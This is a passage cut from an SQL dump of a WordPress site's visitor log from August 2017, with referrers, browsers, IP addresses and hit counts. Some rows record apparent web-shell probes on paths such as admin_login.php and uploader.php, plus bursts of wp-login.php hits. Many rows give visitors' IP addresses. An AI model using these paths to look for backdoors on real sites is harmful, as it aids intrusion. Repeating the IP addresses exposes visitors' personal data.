,0),(9297,'2017-08-18','http://zphiblgz.org','Firefox','Windows','40.1','','146.135.27.56','000',1,0),(9298,'2017-08-18','http://yoshkarola.zrus.org/','MSIE','Windows','2.0','','46.118.125.246','000',3,0),(9299,'2017-08-18','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','217.160.62.77','000',1,0),(9300,'2017-08-18','http://zphiblgz.org','Firefox','Windows','40.1','','189.19.158.178','000',1,0),(9301,'2017-08-18','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(9302,'2017-08-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','95.142.161.63','000',2,0),(9303,'2017-08-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.134.120','000',1,0),(9304,'2017-08-18','zphiblgz.org','Chrome','Windows','50.0.2661.75','','149.202.70.53','000',1,0),(9305,'2017-08-18','https://kichenaid.ru/','Opera','Windows','9.0','','46.118.154.36','000',2,0),(9306,'2017-08-18','http://zphiblgz.org/','Safari','iPad','9.0','','98.252.56.15','000',3,0),(9307,'2017-08-18','http://zphiblgz.org','Firefox','Windows','30.0','','148.101.43.106','000',70,0),(9308,'2017-08-19','http://zphiblgz.org','Firefox','Windows','40.1','','121.105.118.214','000',1,0),(9309,'2017-08-19','http://zphiblgz.org','Firefox','Windows','40.1','','157.50.8.27','000',2,0),(9310,'2017-08-19','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.0','000',1,0),(9311,'2017-08-19','http://zphiblgz.org','Firefox','Windows','40.1','','114.125.202.13','000',2,0),(9312,'2017-08-19','http://aktobe.xkaz.org/','MSIE','Windows','2.0','','46.118.154.36','000',2,0),(9313,'2017-08-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.195.80.10','000',2,0),(9314,'2017-08-19','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1518._nPKucgY9zkiy4KADNI1JZNnMRaHVGdQV4ZtdVLGWLWrPRsLGjkaXxzFtx2kDj0X.67bc9ef84cfba9db5119fa13535c70d6628d8f16&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YLeQVNu7TCjFWhspMNrg36Y&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSkM0UUo2Vy16am5CdklvemRXVVZDbWtrNGF0QVZYN0tVcF9FMnJETWQ1NzZ5UlRaV0xJWFRv&b64e=2&sign=fba4436aeb2a8827d7caa809af99e3d2&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbiydryQslsiFlIlYCid-ywSW6VWYKkq4wwS4FjB_H_C8NWqGC05XURI5E7Lqw94csH3M5toD89mWNa2b-EL1HI7Dye7q0h_lKP74YRqdleZMGe-LbQkLmqg3DikJDhvtpY&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWuAUzT58TqAZLZgCX2DF1QXpQeGpvoOOQa7_8WUMevOVA9Ha-ZCy0ZsR5GaJoYQM2x6o77MY_8NA&l10n=ru&cts=1503142692791&mc=7.11687605075','Firefox','Windows','53.0','','188.32.234.52','000',1,0),(9315,'2017-08-19','http://zphiblgz.org','Firefox','Windows','40.1','','112.135.98.1','000',2,0),(9316,'2017-08-19','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','186.193.186.123','000',11,0),(9317,'2017-08-19','http://zphiblgz.org/','Chrome','Windows','36.0.1985.125','','84.205.40.4','000',1,0),(9318,'2017-08-19','http://zphiblgz.org/wp-login.php?lang=en','Chrome','Windows','36.0.1985.125','','178.253.236.197','000',120,0),(9319,'2017-08-19','http://zphiblgz.org/wp-login.php?lang=en','Chrome','Windows','36.0.1985.125','','188.25.7.202','000',1,0),(9320,'2017-08-19','http://zphiblgz.org/wp-login.php?lang=en','Chrome','Windows','36.0.1985.125','','213.80.121.150','000',1,0),(9321,'2017-08-19','http://zphiblgz.org/wp-login.php?lang=en','Chrome','Windows','36.0.1985.125','','85.202.145.88','000',235,0),(9322,'2017-08-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.131','000',2,0),(9323,'2017-08-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',2,0),(9324,'2017-08-19','http://zphiblgz.org/','Chrome','Windows','48.0.2564.116','','176.123.6.123','000',1,0),(9325,'2017-08-19','http://zphiblgz.org','Firefox','Windows','38.0','','176.123.6.123','000',1,0),(9326,'2017-08-19','https://univerfiles.com/','Opera','Windows','9.0','','46.118.125.246','000',4,0),(9327,'2017-08-19','https://via-energy-acquistare.com/','MSIE','Windows','6.0','','46.118.154.36','000',2,0),(9328,'2017-08-19','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','148.72.232.38','000',2,0),(9329,'2017-08-19','http://stroyplus.ru/','Unknown','Unknown','Unknown','','188.163.79.53','000',3,0),(9330,'2017-08-19','http://zphiblgz.org','Firefox','Windows','40.1','','201.24.205.18','000',2,0),(9331,'2017-08-19','https://www.facebook.com/businesses.center/','MSIE','Windows','2.0','','178.137.4.41','000',2,0),(9332,'2017-08-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','31.131.4.167','000',2,0),(9333,'2017-08-19','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',10,0),(9334,'2017-08-19','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.184','000',6,0),(9335,'2017-08-19','http://zphiblgz.org','Firefox','Windows','40.1','','157.158.182.146','000',1,0),(9336,'2017-08-19','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','217.160.62.10','000',1,0),(9337,'2017-08-19','http://zphiblgz.org','MSIE','Windows','11.0','','54.152.200.93','000',1,0),(9338,'2017-08-19','https://essayservicewriting.org/','MSIE','Windows','6.0','','134.249.80.194','000',3,0),(9339,'2017-08-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.148','000',1,0),(9340,'2017-08-19','http://zphiblgz.org','Firefox','Windows','40.1','','202.83.175.1','000',1,0),(9341,'2017-08-19','http://zphiblgz.org','Go--client','Unknown','1.1','','217.182.94.53','000',2,0),(9342,'2017-08-19','http://zphiblgz.org','Go--client','Unknown','1.1','','217.182.94.191','000',1,0),(9343,'2017-08-19','http://zphiblgz.org','Go--client','Unknown','1.1','','217.182.91.132','000',1,0),(9344,'2017-08-19','http://zphiblgz.org','Go--client','Unknown','1.1','','217.182.91.28','000',2,0),(9345,'2017-08-19','http://zphiblgz.org','Go--client','Unknown','1.1','','217.182.88.168','000',1,0),(9346,'2017-08-19','https://mojaocena.com/','MSIE','Windows','5.5','','188.163.79.53','000',2,0),(9347,'2017-08-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.69.67.17','000',2,0),(9348,'2017-08-19','https://mmostrike.ru/','Opera','Windows','7.11','','46.118.118.100','000',1,0),(9349,'2017-08-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.123','000',1,0),(9350,'2017-08-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.124','000',1,0),(9351,'2017-08-19','https://kursy-ege.ru/','Opera','Windows','8.00','','188.163.79.53','000',1,0),(9352,'2017-08-20','http://zphiblgz.org','Firefox','Windows','40.1','','69.132.197.241','000',1,0),(9353,'2017-08-20','http://zphiblgz.org','Chrome','Macintosh','60.0.3112.90','','138.197.96.235','000',1,0),(9354,'2017-08-20','http://zphiblgz.org','Safari','iPhone','6.0','','123.126.113.104','000',1,0),(9355,'2017-08-20','http://videochat.mx/','MSIE','Windows','6.0','','46.118.118.100','000',4,0),(9356,'2017-08-20','http://nextrent-crimea.ru/','Opera','Windows','8.00','','46.118.118.100','000',2,0),(9357,'2017-08-20','http://zphiblgz.org','Firefox','Windows','40.1','','47.9.129.25','000',2,0),(9358,'2017-08-20','http://zphiblgz.org','Firefox','Windows','40.1','','73.172.132.167','000',1,0),(9359,'2017-08-20','http://zphiblgz.org','curl','Unknown','7.54.1','','95.211.38.163','000',1,0),(9360,'2017-08-20','http://podshipniki-ntn.ru/','Opera','Windows','9.00','','178.137.4.41','000',3,0),(9361,'2017-08-20','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','173.236.60.210','000',2,0),(9362,'2017-08-20','http://zphiblgz.org','wp-windowsphone','Unknown','Unknown','','173.236.60.210','000',1,0),(9363,'2017-08-20','http://zphiblgz.org','Firefox','Windows','40.1','','185.207.147.150','000',2,0),(9364,'2017-08-20','http://zphiblgz.org','Firefox','Windows','21.0','','138.197.64.38','000',1,0),(9365,'2017-08-20','http://zphiblgz.org','Firefox','Windows','28.0','','138.197.64.38','000',1,0),(9366,'2017-08-20','http://zphiblgz.org','Firefox','Macintosh','29.0','','138.197.64.38','000',3,0),(9367,'2017-08-20','http://zphiblgz.org','MSIE','Windows','9.0','','138.197.64.38','000',1,0),(9368,'2017-08-20','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','138.197.64.38','000',3,0),(9369,'2017-08-20','http://zphiblgz.org','MSIE','Windows','11.0','','151.80.41.241','000',1,0),(9370,'2017-08-20','http://zphiblgz.org','Firefox','Windows','40.1','','185.9.253.239','000',1,0),(9371,'2017-08-20','https://ikritikimou.gr/','Opera','Windows','7.54','','188.163.79.53','000',2,0),(9372,'2017-08-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','31.131.4.167','000',1,0),(9373,'2017-08-20','http://zphiblgz.org/','Firefox','Windows','7.0.1','','155.4.230.97','000',1,0),(9374,'2017-08-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.67.180','000',1,0),(9375,'2017-08-20','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.162.106','000',1,0),(9376,'2017-08-20','https://emerson-rus.ru/','Opera','Windows','9.0','','46.118.154.36','000',5,0),(9377,'2017-08-20','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(9378,'2017-08-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',2,0),(9379,'2017-08-20','http://yoshkarola.zrus.org/','Opera','Windows','9.00','','46.118.125.246','000',3,0),(9380,'2017-08-20','http://zphiblgz.org','Chrome','Macintosh','36.0.1985.125','','125.64.94.206','000',8,0),(9381,'2017-08-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.131','000',2,0),(9382,'2017-08-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.47.227.114','000',2,0),(9383,'2017-08-20','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(9384,'2017-08-20','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',2,0),(9385,'2017-08-20','http://zphiblgz.org/','Chrome','Macintosh','58.0.3029.110','','181.48.167.142','000',2,0),(9386,'2017-08-20','http://zphiblgz.org','Opera','Windows','12.17','','181.48.167.142','000',1,0),(9387,'2017-08-20','http://zphiblgz.org','Opera','Windows','12.17','','103.195.142.88','000',4,0),(9388,'2017-08-20','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','157.7.106.200','000',2,0),(9389,'2017-08-20','http://zphiblgz.org','Windows','Unknown','Unknown','','157.7.106.200','000',1,0),(9390,'2017-08-20','http://zphiblgz.org','Firefox','Windows','40.1','','103.4.248.246','000',1,0),(9391,'2017-08-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(9392,'2017-08-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.166','000',2,0),(9393,'2017-08-20','http://aktobe.xkaz.org/','MSIE','Windows','6.0','','46.118.154.36','000',1,0),(9394,'2017-08-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.218.240.21','000',2,0),(9395,'2017-08-20','http://zphiblgz.org','Firefox','Windows','40.1','','79.172.72.215','000',2,0),(9396,'2017-08-20','http://zphiblgz.org','Firefox','Windows','40.1','','88.85.97.114','000',1,0),(9397,'2017-08-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.196.66.162','000',2,0),(9398,'2017-08-20','http://zphiblgz.org','Firefox','Windows','40.1','','177.37.132.2','000',1,0),(9399,'2017-08-20','http://zphiblgz.org','Firefox','Windows','40.1','','200.84.137.136','000',1,0),(9400,'2017-08-20','http://zphiblgz.org','MSIE','Windows','5.0','','128.177.10.252','000',3,0),(9401,'2017-08-20','http://macrotek.ru/','Opera','Windows','7.60','','188.163.79.53','000',1,0),(9402,'2017-08-21','https://via-energy-order.com/','MSIE','Windows','6.0','','46.118.154.36','000',2,0),(9403,'2017-08-21','http://zphiblgz.org','MSIE','Windows','9.0','','217.22.43.154','000',55,0),(9404,'2017-08-21','http://zphiblgz.org','Safari','iPad','10.0','','46.229.170.197','000',1,0),(9405,'2017-08-21','http://zphiblgz.org','Chrome','Macintosh','56.0.2924.87','','46.229.170.197','000',1,0),(9406,'2017-08-21','http://zphiblgz.org','Firefox','Windows','40.1','','58.161.146.203','000',1,0),(9407,'2017-08-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.89.19','000',2,0),(9408,'2017-08-21','http://pk-pomosch.ru/','MSIE','Windows','6.0','','46.118.125.246','000',1,0),(9409,'2017-08-21','http://zphiblgz.org/wp-content/plugins/disable-comments/logo_img.php','Chrome','Windows','5.0.375.99','','78.110.50.137','000',1,0),(9410,'2017-08-21','http://zphiblgz.org','Firefox','Windows','40.1','','203.81.68.236','000',2,0),(9411,'2017-08-21','http://zphiblgz.org','Firefox','Windows','40.1','','130.0.26.244','000',1,0),(9412,'2017-08-21','https://www.facebook.com/businesses.center/','Opera','Windows','7.54','','178.137.4.41','000',3,0),(9413,'2017-08-21','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','91.126.176.49','000',1,0),(9414,'2017-08-21','http://zphiblgz.org','Poster','Unknown','Unknown','','91.126.176.49','000',1,0),(9415,'2017-08-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.140.123','000',2,0),(9416,'2017-08-21','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','174.56.172.8','000',12,0),(9417,'2017-08-21','https://mojaocena.com/','MSIE','Windows','6.0','','188.163.79.53','000',1,0),(9418,'2017-08-21','http://zphiblgz.org','Firefox','Windows','40.1','','39.36.112.110','000',1,0),(9419,'2017-08-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.148','000',1,0),(9420,'2017-08-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.89','000',2,0),(9421,'2017-08-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.206','000',2,0),(9422,'2017-08-21','http://zphiblgz.org','Firefox','Windows','40.1','','5.36.23.236','000',1,0),(9423,'2017-08-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','31.185.104.19','000',2,0),(9424,'2017-08-21','http://zphiblgz.org/wp-content/wordpress_cache.php','Chrome','Windows','5.0.375.99','','207.246.240.113','000',1,0),(9425,'2017-08-21','http://zphiblgz.org','Chrome','Windows','34.0.1847.116','','146.185.144.64','000',1,0),(9426,'2017-08-21','http://zphiblgz.org/xmlrpc/header_img.php','Chrome','Windows','5.0.375.99','','81.177.135.161','000',1,0),(9427,'2017-08-21','https://venerologiya.com/','Opera','Windows','8.01','','188.163.79.53','000',1,0),(9428,'2017-08-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.165','000',2,0),(9429,'2017-08-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.200','000',1,0),(9430,'2017-08-21','http://zphiblgz.org/','Firefox','Windows','7.0.1','','193.15.16.4','000',1,0),(9431,'2017-08-21','http://zphiblgz.org','Firefox','Windows','40.1','','103.83.235.131','000',1,0),(9432,'2017-08-21','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(9433,'2017-08-21','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(9434,'2017-08-21','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.76','000',1,0),(9435,'2017-08-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',2,0),(9436,'2017-08-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.167.96','000',2,0),(9437,'2017-08-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.183.221.231','000',1,0),(9438,'2017-08-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.58.100.240','000',2,0),(9439,'2017-08-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.41.8','000',4,0),(9440,'2017-08-21','https://pl.id-forex.com/','MSIE','Windows','6.0','','46.118.118.100','000',8,0),(9441,'2017-08-21','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.78','000',1,0),(9442,'2017-08-21','https://pl-top.pl/','Opera','Windows','8.00','','188.163.79.53','000',2,0),(9443,'2017-08-21','http://optom-deshevo.ru/','Unknown','Unknown','Unknown','','46.118.125.246','000',2,0),(9444,'2017-08-21','http://zphiblgz.org','Firefox','Windows','40.1','','197.210.24.121','000',2,0),(9445,'2017-08-21','http://zphiblgz.org','Firefox','Windows','40.1','','122.107.70.251','000',2,0),(9446,'2017-08-21','http://hdwallpapers-free.com/','Opera','Windows','6.0','','178.137.4.41','000',1,0),(9447,'2017-08-21','http://zphiblgz.org','Firefox','Windows','40.1','','90.161.114.7','000',1,0),(9448,'2017-08-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.169.38','000',2,0),(9449,'2017-08-22','http://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','62.210.151.76','000',5,0),(9450,'2017-08-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.162.106','000',2,0),(9451,'2017-08-22','https://i-hobot.ru/','Opera','Windows','8.01','','46.118.154.36','000',2,0),(9452,'2017-08-22','http://zphiblgz.org/xmlrpc/logo_img.php','Chrome','Windows','5.0.375.99','','198.71.227.10','000',2,0),(9453,'2017-08-22','http://zphiblgz.org','Firefox','Windows','40.1','','103.255.7.39','000',2,0),(9454,'2017-08-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.255.202.66','000',2,0),(9455,'2017-08-22','http://zphiblgz.org/wp-content/uploads/logo_img.php','Chrome','Windows','5.0.375.99','','83.220.175.156','000',2,0),(9456,'2017-08-22','http://zphiblgz.org','Firefox','Windows','40.1','','95.176.129.244','000',1,0),(9457,'2017-08-22','http://kaliningrad.zrus.org/','MSIE','Windows','6.0','','46.118.125.246','000',1,0),(9458,'2017-08-22','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1521.JkEiT47D5SBbPGnY-bmo6fkNBA4aTv8QkxzFRbKPM7Ram55nk-2SeubK80wVZcIL.eff24f74ef33d463369244467257e615d6cbd8fb&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGftRg9cP1erjBfVTUcXDXk&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSkM0UUo2Vy16am5HbnViUFZQanNlV2RPMmZRMU5RcTdxV2dkUWZXVmNfNkdLcHRXRWo3NzFp&b64e=2&sign=8c14e7e35f0d177831927ff4caa81294&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4gBDtXMAikq24pZedFkO9ikTV4jM8o7bRr_ktubPsWrAN2YwWWoUqOMmcKMpxW_w6Up0KSTLCIOtXHI_3MRchWr2ybz26ugMj_WQf4mjHMf6wQT0Atn2MNCsFuPV_qj-2&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVwjJVQHb9Cs70HkJuoVQNeRSPj6_ViHvFs2hVIZA6dOp0ACrp30Cpzpxs7nRMPzdJknMdQlxX9rw&l10n=ru&cts=1503400529147&mc=3.361606316','Firefox','Windows','53.0','','95.28.225.223','000',1,0),(9459,'2017-08-22','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','104.244.82.211','000',1,0),(9460,'2017-08-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.47.246.21','000',1,0),(9461,'2017-08-22','http://zphiblgz.org','curl','Unknown','7.54.1','','95.211.38.163','000',1,0),(9462,'2017-08-22','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','54.210.46.52','000',2,0),(9463,'2017-08-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.41.8','000',2,0),(9464,'2017-08-22','http://zphiblgz.org','Firefox','Windows','40.1','','111.88.107.149','000',2,0),(9465,'2017-08-22','http://shymkent.xkaz.org/','Unknown','Unknown','Unknown','','46.118.154.36','000',2,0),(9466,'2017-08-22','https://buydissertation.net/','MSIE','Windows','6.0','','134.249.80.194','000',3,0),(9467,'2017-08-22','http://zphiblgz.org','MSIE','Windows','6.0','','198.204.244.162','000',1,0),(9468,'2017-08-22','https://esopini.com/','MSIE','Windows','5.5','','46.118.118.100','000',2,0),(9469,'2017-08-22','http://zphiblgz.org/wp-includes/admin_login.php','Chrome','Windows','5.0.375.99','','188.166.38.188','000',2,0),(9470,'2017-08-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.218.63.73','000',2,0),(9471,'2017-08-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.195','000',2,0),(9472,'2017-08-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.240.34','000',2,0),(9473,'2017-08-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.58.100.98','000',2,0),(9474,'2017-08-22','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',1,0),(9475,'2017-08-22','http://macrotek.ru/','MSIE','Windows','6.0','','188.163.79.53','000',3,0),(9476,'2017-08-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.11','000',2,0),(9477,'2017-08-22','http://zphiblgz.org','Firefox','Windows','40.1','','194.213.237.85','000',1,0),(9478,'2017-08-22','http://zphiblgz.org','Firefox','Windows','40.1','','46.10.141.223','000',1,0),(9479,'2017-08-22','http://www.zphibmaryland.org/chapters/','Chrome','Windows','60.0.3112.101','','50.58.85.10','000',2,0),(9480,'2017-08-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','130.226.169.137','000',2,0),(9481,'2017-08-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.141.39.47','000',2,0),(9482,'2017-08-22','http://zphiblgz.org','Firefox','Windows','40.1','','39.36.104.148','000',2,0),(9483,'2017-08-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(9484,'2017-08-22','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',4,0),(9485,'2017-08-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','156.67.106.32','000',2,0),(9486,'2017-08-22','http://zphiblgz.org','Firefox','Windows','40.1','','123.63.153.57','000',2,0),(9487,'2017-08-22','https://www.google.com/','Chrome','Windows','60.0.3112.101','','108.250.100.241','000',4,0),(9488,'2017-08-22','zphiblgz.org','Chrome','Windows','50.0.2661.75','','95.110.200.241','000',2,0),(9489,'2017-08-22','https://stillmiracle.com/','MSIE','Unknown','6.0','','46.118.154.36','000',2,0),(9490,'2017-08-22','http://zphiblgz.org','Firefox','Windows','40.1','','92.97.57.40','000',1,0),(9491,'2017-08-22','http://ya.ru/?q=http%3A%2F%2Fzphiblgz.org%2Fimplenentation','Chrome','Windows','17.0.963.46','','195.242.80.124','000',1,0),(9492,'2017-08-22','http://google.com/','Firefox','Windows','33.1','','185.154.14.21','000',1,0),(9493,'2017-08-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.132','000',2,0),(9494,'2017-08-22','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1521.0h0y9yCtMtVl_3B0YM5sJjHstjOxOxylYjQrj4yS4O25yo-jkepbQ7s9pa5b1QUW.ebcf961fa64df647b5c7e19184db27d604db2814&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YOm24rr5dkiDnIjpu2TfUVc&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSkM0UUo2Vy16am5MYzBqNkJHOHpGdDZLQnRJSHJjNzRGanhoaV9oOGpDTzhHMUx5eDAzcmNa&b64e=2&sign=9c0cc42bd9f17acd9caf0c8d58fac415&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQULnoVAFacUfU8Z-6zl-j0jzKSc-Dg74qzVi-mSuy2ITgNczFUB23j8XP_4JnQzavHJ14_ke7BhDmPdv2wV-ZNz0aUXDDn0DXxT9xJkT0WKlGefbisP2xNRPEPIyRmvy96IXnOH8aZm7&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWQWxj6qvocPwwBq-fTIzpNt_IFW02vZgbhDs397UBLPbFwBdKMXvZ6LoP1erayuNEbsbAJm97ogQ&l10n=ru&cts=1503441984890&mc=4.84351221082','Firefox','Windows','53.0','','5.228.8.4','000',1,0),(9495,'2017-08-22','http://zphiblgz.org','Firefox','Windows','40.1','','58.65.136.162','000',1,0),(9496,'2017-08-22','https://minharevisao.com/','MSIE','Windows','5.0','','188.163.79.53','000',1,0),(9497,'2017-08-22','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.118','000',1,0),(9498,'2017-08-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.169','000',2,0),(9499,'2017-08-22','http://zphiblgz.org','Chrome','Windows','60.0.3112.101','','185.161.209.189','000',1,0),(9500,'2017-08-22','http://zphiblgz.org','Firefox','Windows','40.1','','62.210.151.76','000',1,0),(9501,'2017-08-22','http://zphiblgz.org/','Safari','Macintosh','10.1.1','','163.172.4.153','000',1,0),(9502,'2017-08-22','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.137.88.27','000',1,0),(9503,'2017-08-22','http://pc-services.ru/','MSIE','Windows','7.0','','46.118.125.246','000',3,0),(9504,'2017-08-22','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.36','000',1,0),(9505,'2017-08-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.73.74','000',1,0),(9506,'2017-08-23','http://zphiblgz.org/','Firefox','Windows','7.0.1','','37.139.8.104','000',1,0),(9507,'2017-08-23','https://2000k.ru/','Opera','Windows','9.00','','178.137.4.41','000',1,0),(9508,'2017-08-23','http://zphiblgz.org/wp-admin/favicon_img.php','Chrome','Windows','5.0.375.99','','87.236.20.167','000',1,0),(9509,'2017-08-23','http://zphiblgz.org','Firefox','Windows','40.1','','182.48.72.156','000',1,0),(9510,'2017-08-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.163.85','000',1,0),(9511,'2017-08-23','http://zphiblgz.org','Firefox','Linux','54.0','','138.197.111.108','000',1,0),(9512,'2017-08-23','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','118.69.174.27','000',2,0),(9513,'2017-08-23','http://zphiblgz.org','Firefox','Windows','40.1','','94.189.170.0','000',1,0),(9514,'2017-08-23','http://zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','195.154.251.162','000',1,0),(9515,'2017-08-23','http://zphiblgz.org/wp/logo_img.php','Chrome','Windows','5.0.375.99','','178.210.90.90','000',4,0),(9516,'2017-08-23','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.76','000',2,0),(9517,'2017-08-23','http://zphiblgz.org/wp-includes/admin_login.php','Chrome','Windows','5.0.375.99','','188.116.9.217','000',1,0),(9518,'2017-08-23','http://zphiblgz.org','Firefox','Windows','40.1','','62.210.151.76','000',1,0),(9519,'2017-08-23','http://zphiblgz.org','Firefox','Windows','40.1','','117.196.144.107','000',2,0),(9520,'2017-08-23','http://zphiblgz.org/wp-content/wp-content/logo_img.php','Chrome','Windows','5.0.375.99','','46.30.41.136','000',2,0),(9521,'2017-08-23','https://educontest.net/','MSIE','Windows','6.0','','188.163.79.53','000',2,0),(9522,'2017-08-23','http://zphiblgz.org','Firefox','Linux','47.0','','159.203.173.172','000',1,0),(9523,'2017-08-23','http://zphiblgz.org','MSIE','Windows','10.0','','159.203.173.172','000',2,0),(9524,'2017-08-23','http://zphiblgz.org','Opera Next','Macintosh','46.0.2597.57','','159.203.173.172','000',1,0),(9525,'2017-08-23','http://zphiblgz.org','Firefox','Macintosh','54.0','','159.203.173.172','000',2,0),(9526,'2017-08-23','http://zphiblgz.org','Chrome','Macintosh','60.0.3112.90','','159.203.173.172','000',2,0),(9527,'2017-08-23','http://zphiblgz.org','Chrome','Windows','60.0.3112.78','','159.203.173.172','000',1,0),(9528,'2017-08-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',2,0),(9529,'2017-08-23','http://zphiblgz.org/wp-admin/system_cache.php','Chrome','Windows','5.0.375.99','','91.98.103.46','000',2,0),(9530,'2017-08-23','http://zphiblgz.org','MSIE','Windows','11.0','','148.251.2.2','000',2,0),(9531,'2017-08-23','http://zphiblgz.org','Safari','Linux','538.1','','148.251.2.2','000',41,0),(9532,'2017-08-23','http://zphiblgz.org','Firefox','Windows','36.0','','148.251.2.2','000',8,0),(9533,'2017-08-23','http://zphiblgz.org','MSIE','Windows','11.0','','142.54.161.10','000',3,0),(9534,'2017-08-23','http://zphiblgz.org','MSIE','Windows','6.0','','185.82.219.76','000',1,0),(9535,'2017-08-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.54.136','000',1,0),(9536,'2017-08-23','http://zphiblgz.org','Firefo